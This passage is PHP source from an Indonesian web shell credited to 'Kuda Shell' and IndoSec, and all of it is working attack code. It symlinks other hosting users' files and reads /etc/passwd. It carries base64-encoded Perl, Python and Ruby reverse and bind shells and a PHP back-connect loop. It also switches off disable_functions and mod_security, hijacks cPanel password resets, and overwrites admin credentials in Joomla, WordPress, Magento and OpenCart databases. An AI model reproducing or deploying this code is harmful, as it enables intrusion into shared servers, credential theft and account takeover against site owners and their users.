- $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
- $matches = str_replace("home/","",$matches[1]);
- if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
- continue;
- echo "<tr>
- <td>".$dcount."</td>
- <td>".$matches."</td>
- <td><a href=$full/indosec_sym/root/home/".$matches."/public_html target='_blank'>Symlink</a></td>
- </tr>";
- $dcount++;
- }
- fclose($file);
- echo "</table></div>";
- unlink("test.txt");
- }
- }
- }
- exit;
- }
- if($_GET['aksi'] == 'symread') {
- echo "read /etc/named.conf";
- echo "<form method='post' action='?dir=$dir&aksi=symread&save=1'>
- <textarea class='form-control' rows='13' name='file'>";
- flush();
- flush();
- $file = '/etc/named.conf';
- $r3ad = @fopen($file, 'r');
- if ($r3ad){
- $content = @fread($r3ad, @filesize($file));
- echo "".htmlentities($content)."";
- }else if (!$r3ad) {
- $r3ad = @show_source($file) ;
- }else if (!$r3ad) {
- $r3ad = @highlight_file($file);
- }else if (!$r3ad) {
- $sm = @symlink($file,'sym.txt');
- if ($sm){
- $r3ad = @fopen('sym/sym.txt', 'r');
- $content = @fread($r3ad, @filesize($file));
- echo "".htmlentities($content)."";
- }
- }
- echo "</textarea><br/><input type='submit' class='btn btn-danger form-control' value='Save'/> </form>";
- if(isset($_GET['save'])){
- $cont = stripcslashes($_POST['file']);
- $f = fopen('named.txt','w');
- $w = fwrite($f,$cont);
- if($w){
- echo '<br/>save has been successfully';
- }
- fclose($f);
- }
- exit;
- }
- if ($_GET['aksi'] == 'sym_404'){
- $cp = get_current_user();
- if($_POST['execute']){
- @rmdir("indosec_sym404");
- @mkdir("indosec_sym404", 0777);
- $dir = $_POST['dir'];
- $isi = $_POST['isi'];
- @system("ln -s ".$dir."indosec_sym404/".$isi);
- @symlink($dir,"indosec_sym404/".$isi);
- $inija = fopen("indosec_sym404/.htaccess", "w");
- @fwrite($inija,"ReadmeName ".$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain php html php5 phtml\nAddHandler text/plain php html php5 phtml\nSatisfy Any");
- echo'<a href="/indosec_sym404/" target="_blank" class="btn btn-success btn-block mb-3">Click Me!!</a>';
- }else{
- echo '<h2>Symlink 404</h2>
- <form method="post">
- File Target: <input type="text" class="form-control" name="dir" value="/home/'.$cp.'/public_html/wp-config.php"><br/>
- Save As: <input type="text" class="form-control" name="isi" placeholder="[Ex] file.txt"/><br/>
- <input type="submit" class="btn btn-danger btn-block" value="Execute" name="execute"/>
- <p class="text-muted">NB: Letak wp-config tidak semuanya berada di <u>public_html/wp-config.php</u> jadi silahkan ubah sesuai letaknya.</p>
- </form>';
- }
- exit;
- }
- if ($_GET['aksi'] == 'sym_bypas'){
- $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
- $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
- $u = explode("/",$pageFTP );
- $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
- if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
- $cont = stripcslashes($_POST['file']);
- if(!file_exists('passwd.txt')){
- $f = @fopen('passwd.txt','w');
- $w = @fwrite($f,$cont);
- fclose($f);
- }
- if($w or @filesize('passwd.txt') > 0){
- echo "<div class='tmp'>
- <table width='100%' class='text-center table-responsive mb-4'>
- <thead class='bg-info'>
- <th>Users</th>
- <th>symlink</th>
- <th>FTP</th>
- </thead>";
- flush();
- $fil3 = file('passwd.txt');
- foreach ($fil3 as $f){
- $u=explode(':', $f);
- $user = $u['0'];
- echo "<tr>
- <td class='text-left pl-1'>$user</td>
- <td>
- <a href='$full/sym/root/home/$user/public_html' target='_blank'>Symlink </a>
- </td>
- <td>
- <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
- </td>
- </tr>";
- flush();
- flush();
- }
- echo "</tr></table></div>";
- die();
- }
- }
- echo "read /etc/passwd <font color='red'>error ? </font><a href='?dir=".$dir."&aksi=passwbypass'>Bypass Here</a>
- <form method='post' action='?dir=$dir&aksi=sym_bypas&save=1'>
- <textarea class='form-control' rows='13' name='file'>";
- flush();
- $file = '/etc/passwd';
- $r3ad = @fopen($file, 'r');
- if ($r3ad){
- $content = @fread($r3ad, @filesize($file));
- echo "".htmlentities($content)."";
- }elseif(!$r3ad) {
- $r3ad = @show_source($file) ;
- }elseif(!$r3ad) {
- $r3ad = @highlight_file($file);
- }elseif(!$r3ad) {
- for($uid=0;$uid<1000;$uid++){
- $ara = posix_getpwuid($uid);
- if (!empty($ara)) {
- while (list ($key, $val) = each($ara)){
- print "$val:";
- }
- print "\n";
- }
- }
- }
- flush();
- echo "</textarea><br/>
- <input type='submit' class='btn btn-danger btn-block' value='Symlink'/>
- </form>";
- flush();
- exit;
- }
- /*
- * Back Connect
- * Kuda Shell
- */
- if($_GET['aksi'] == 'bctools'){
- echo "<h4 class='text-center mb-4'>Back Connect Tools</h4>
- <form method='post'>
- <div class='row'>
- <div class='col-md-10'>
- <span>Bind port to /bin/sh [Perl]</span><br/>
- <label>Port :</label>
- <div class='form-group input-group mb-4'>
- <input type='text' name='port' class='form-control' value='6969'>
- <input type='submit' name='bpl' class='btn btn-danger form-control' value='Reserve'>
- </div>
- <h5>Back-Connect</h5>
- <label>Server :</label>
- <input type='text' name='server' class='form-control mb-3' placeholder='". $_SERVER['REMOTE_ADDR'] ."'>
- <label>Port :</label>
- <div class='form-group input-group mb-4'>
- <input type='text' name='port' class='form-control' placeholder='443'>
- <select class='form-control' name='backconnect'>
- <option value='perl'>Perl</option>
- <option value='php'>PHP</option>
- <option value='python'>Python</option>
- <option value='ruby'>Ruby</option>
- </select>
- </div>
- <input type='submit' class='btn btn-danger btn-block' value='Connect'>
- </div>
- </div>
- </form>";
- if($_POST['bpl']) {
- $bp = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");
- $brt = @fopen('bp.pl','w');
- fwrite($brt,$bp);
- $out = exe("perl bp.pl ".$_POST['port']." 1>/dev/null 2>&1 &");
- sleep(1);
- echo "<pre class='text-light'>$out\n".exe("ps aux | grep bp.pl")."</pre>";
- unlink("bp.pl");
- }
- if($_POST['backconnect'] == 'perl') {
- $bc = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");
- $plbc = @fopen('bc.pl','w');
- fwrite($plbc,$bc);
- $out = exe("perl bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &");
- sleep(1);
- echo "<pre class='text-light'>$out\n".exe("ps aux | grep bc.pl")."</pre>";
- unlink("bc.pl");
- }
- if($_POST['backconnect'] == 'python') {
- $becaa = base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=");
- $pbcaa = @fopen('bcpyt.py','w');
- fwrite($pbcaa,$becaa);
- $out1 = exe("python bcpyt.py ".$_POST['server']." ".$_POST['port']);
- sleep(1);
- echo "<pre class='text-light'>$out1\n".exe("ps aux | grep bcpyt.py")."</pre>";
- unlink("bcpyt.py");
- }
- if($_POST['backconnect'] == 'ruby') {
- $becaak = base64_decode("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k");
- $pbcaak = @fopen('bcruby.rb','w');
- fwrite($pbcaak,$becaak);
- $out2 = exe("ruby bcruby.rb ".$_POST['server']." ".$_POST['port']);
- sleep(1);
- echo "<pre class='text-light'>$out2\n".exe("ps aux | grep bcruby.rb")."</pre>";
- unlink("bcruby.rb");
- }
- if($_POST['backconnect'] == 'php') {
- $ip = $_POST['server'];
- $port = $_POST['port'];
- $sockfd = fsockopen($ip , $port , $errno, $errstr );
- if($errno != 0){
- echo "<font color='red'>$errno : $errstr</font>";
- } else if (!$sockfd){
- $result = "<p>Unexpected error has occured, connection may have failed.</p>";
- } else {
- fputs ($sockfd ,"
- \n{#######################################}
- \n..:: BackConnect PHP By Con7ext ::..
- \n{#######################################}\n");
- $dir = @shell_exec("pwd");
- $sysinfo = @shell_exec("uname -a");
- $time = @Shell_exec("time");
- $len = 1337;
- fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
- while(!feof($sockfd)){
- $cmdPrompt = '[kuda]#:> ';
- @fputs ($sockfd , $cmdPrompt );
- $command= fgets($sockfd, $len);
- @fputs($sockfd , "\n" . @shell_exec($command) . "\n\n");
- }
- @fclose($sockfd);
- }
- }
- echo "</p>";
- exit;
- }
- /*
- * Bypass Disable Function
- * Kuda Shell
- */
- if($_GET['aksi'] == 'disabfunc'){
- echo "<div class='card card-body text-center text-dark'><h4 class='text-center mt-2 mb-3'>Bypass Disable Functions</h2>
- <form method='POST'>
- <input type='submit' class='btn btn-danger' name='ini' value='php.ini'/>
- <input type='submit' class='btn btn-danger' name='htce' value='.htaccess'/>
- <input type='submit' class='btn btn-danger' name='litini' value='Litespeed'/>
- </form>";
- if(isset($_POST['ini'])){
- $file = fopen("php.ini","w");
- echo fwrite($file,"safe_mode = OFF\ndisable_functions = NONE");
- fclose($file);
- echo "<a href='php.ini' class='btn btn-success btn-block' target='_blank'>Klik Coeg!</a>";
- }elseif(isset($_POST['htce'])){
- $file = fopen(".htaccess","w");
- echo fwrite($file,"<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
- fclose($file);
- echo "<p>.htaccess successfully created!</p>";
- }elseif(isset($_POST['litini'])){
- $iniph = "PD8gZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbImZpbGUiXSk7DQplY2hvIGluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOw0KZWNobyBpbmlfZ2V0KCJzYWZlX21vZGUiKTsNCmVjaG8gaW5pX2dldCgib3Blbl9iYXNlZGlyIik7DQplY2hvIGluY2x1ZGUoJF9HRVRbInNzIl07DQo/Pg==";
- $byph = "safe_mode = OFF\ndisable_functions = NONE";
- $comp = "<Files *.php>\nForceType application/x-httpd-php4\n</Files>";
- file_put_contents("php.ini",$byph);
- file_put_contents("ini.php",$iniph);
- file_put_contents(".htaccess",$comp);
- $swa = "success";
- $text = "Disable Functions in Litespeed Created";
- swall($swa,$text,$dir);
- }
- echo "</div>";
- }
- /*
- * Auto Reset Cpanel
- * IndoSec
- */
- if ($_GET['aksi'] == 'resetpasscp') {
- echo '<h5 class="text-center"><i class="fa fa-key"></i> Auto Reset Password Cpanel</h5>
- <form method="POST">
- <div class="form-group input-group">
- <div class="input-group-prepend">
- <div class="input-group-text"><i class="fa fa-envelope"></i></div>
- </div>
- <input type="email" name="email" class="form-control" placeholder="Masukan Email..."/>
- </div>
- <input type="submit" name="submit" class="btn btn-danger btn-block" value="Send"/>
- </div>
- </form>';
- if(isset($_POST['submit'])){
- $user = get_current_user();
- $site = $_SERVER['HTTP_HOST'];
- $ips = getenv('REMOTE_ADDR');
- $email = $_POST['email'];
- $wr = 'email:'.$email;
- $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w');
- @fwrite($f, $wr);
- @fclose($f);
- $f = fopen('/home/'.$user.'/.contactinfo', 'w');
- @fwrite($f, $wr);
- @fclose($f);
- $parm = $site.':2082/resetpass?start=1';
- echo '<br/>Url: '.$parm.'';
- echo '<br/>Username: '.$user.'';
- echo '<br/>Success Reset To: '.$email.'<br/><br/>';
- }
- exit;
- }
- /*
- * Auto Edit User
- * IndoXploit
- */
- if($_GET['aksi'] == 'auteduser') {
- if($_POST['hajar']) {
- if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
- echo "Username dan Password harus lebih dari 6 karakter";
- } else {
- $user_baru = $_POST['user_baru'];
- $pass_baru = md5($_POST['pass_baru']);
- $conf = $_POST['config_dir'];
- $scan_conf = scandir($conf);
- foreach($scan_conf as $file_conf) {
- if(!is_file("$conf/$file_conf")) continue;
- $config = file_get_contents("$conf/$file_conf");
- if(preg_match("/JConfig|joomla/",$config)) {
- $dbhost = ambilkata($config,"host = '","'");
- $dbuser = ambilkata($config,"user = '","'");
- $dbpass = ambilkata($config,"password = '","'");
- $dbname = ambilkata($config,"db = '","'");
- $dbprefix = ambilkata($config,"dbprefix = '","'");
- $prefix = $dbprefix."users";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
- $result = mysql_fetch_array($q);
- $id = $result['id'];
- $site = ambilkata($config,"sitename = '","'");
- $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => Joomla<br>";
- if($site == '') {
- echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
- } else {
- echo "Sitename => $site<br>";
- }
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/WordPress/",$config)) {
- $dbhost = ambilkata($config,"DB_HOST', '","'");
- $dbuser = ambilkata($config,"DB_USER', '","'");
- $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
- $dbname = ambilkata($config,"DB_NAME', '","'");
- $dbprefix = ambilkata($config,"table_prefix = '","'");
- $prefix = $dbprefix."users";
- $option = $dbprefix."options";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[ID];
- $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
- $result2 = mysql_fetch_array($q2);
- $target = $result2[option_value];
- if($target == '') {
- $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
- } else {
- $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
- }
- $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => Wordpress<br>";
- echo $url_target;
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/Magento|Mage_Core/",$config)) {
- $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
- $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
- $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
- $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
- $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
- $prefix = $dbprefix."admin_user";
- $option = $dbprefix."core_config_data";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[user_id];
- $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
- $result2 = mysql_fetch_array($q2);
- $target = $result2[value];
- if($target == '') {
- $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
- } else {
- $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
- }
- $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => Magento<br>";
- echo $url_target;
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
- $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
- $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
- $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
- $dbname = ambilkata($config,"'DB_DATABASE', '","'");
- $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
- $prefix = $dbprefix."user";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[user_id];
- $target = ambilkata($config,"HTTP_SERVER', '","'");
- if($target == '') {
- $url_target = "Login => <font color=red>Error, Tidak dapat mengambil nama domainnya</font><br>";
- } else {
- $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
- }
- $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => OpenCart<br>";
- echo $url_target;
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=lime>Sukses, Silakan login dengan User & Password yang baru.</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
- $dbhost = ambilkata($config,'server = "','"');
- $dbuser = ambilkata($config,'username = "','"');
- $dbpass = ambilkata($config,'password = "','"');
- $dbname = ambilkata($config,'database = "','"');
- $prefix = "users";
- $option = "identitas";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
